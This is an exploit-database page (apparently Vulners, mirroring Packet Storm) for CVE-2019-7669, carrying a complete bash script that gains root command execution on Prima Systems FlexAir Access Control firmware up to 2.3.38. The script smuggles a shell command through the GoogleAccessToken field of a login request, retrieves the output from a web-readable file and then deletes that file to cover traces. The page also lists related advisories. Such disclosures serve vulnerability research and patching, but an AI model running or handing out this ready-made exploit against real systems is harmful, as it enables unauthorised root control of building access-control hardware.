Vulners
Lucene search
FlexAir Access Control 2.3.38 Command Injection
🗓️ 12 Nov 2019 00:00:00Reported by Sipke MellemaType 
packetstorm🔗 packetstormsecurity.com👁 101 Views
| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
 | Prima FlexAir Command Injection Vulnerability (CNVD-2019-21068) | 2 Jul 201900:00 | – | cnvd |
 | CVE-2019-7669 | 1 Jul 201918:18 | – | cve |
 | CVE-2019-7669 | 1 Jul 201918:18 | – | cvelist |
 | Prima Systems FlexAir | 30 Jul 201900:00 | – | ics |
 | CVE-2019-7669 | 1 Jul 201919:15 | – | nvd |
 | CVE-2019-7669 | 1 Jul 201919:15 | – | osv |
 | Input validation | 1 Jul 201919:15 | – | prion |
 | PT-2019-18692 · Prima Systems · Flexair | 1 Jul 201900:00 | – | ptsecurity |
 | CVE-2019-7669 | 22 May 202508:50 | – | redhatcve |
`#!/bin/bash
#
# Command injection with root privileges in FlexAir Access Control (Prima Systems)
# Firmware version: <= 2.3.38
# CVE: CVE-2019-7669
# Advisory: https://applied-risk.com/resources/ar-2019-007
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
#
# Discovered by Sipke Mellema
# Updated: 14.01.2019
#
##########################################################################
#
# $ ./Nova2.3.38_cmd.sh 192.168.13.37 "id"
# Executing: id
# Output:
# uid=0(root) gid=0(root) groups=0(root),10(wheel)
# Removing temporary file..
# Done
#
##########################################################################
# Output file on the server
OUTPUT_FILE="/www/pages/app/images/logos/output.txt"
# Command to execute
CMD="$2"
# IP address
IP="$1"
# Change HTTP to HTTPS if required
HOST="http://${IP}"
# Add output file
CMD_FULL="${CMD}>${OUTPUT_FILE}"
# Command injection payload. Be careful with single quotes!
PAYLOAD="<requests><request name='LoginUser'><param name='UsrName' value='test'/><param name='UsrEMail' value='[email protected]'/><param name='GoogleAccessToken' value='test;${CMD_FULL}'/></request></requests>"
# Perform exploit
echo "Executing: ${CMD}"
curl --silent --output /dev/null -X POST -d "${PAYLOAD}" "${HOST}/bin/sysfcgi.fx"
# Get output
echo "Output:"
curl -s "${HOST}/app/images/logos/output.txt"
# Remove temp file
echo "Removing temporary file.."
PAYLOAD="<requests><request name='LoginUser'><param name='UsrName' value='test'/><param name='UsrEMail' value='[email protected]'/><param name='GoogleAccessToken' value='test;rm /www/pages/app/images/logos/output.txt'/></request></requests>"
curl --silent --output /dev/null -X POST -d "${PAYLOAD}" "${HOST}/bin/sysfcgi.fx"
echo "Done"
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
12 Nov 2019 00:00Current
0.4Low risk
Vulners AI Score0.4
EPSS0.32014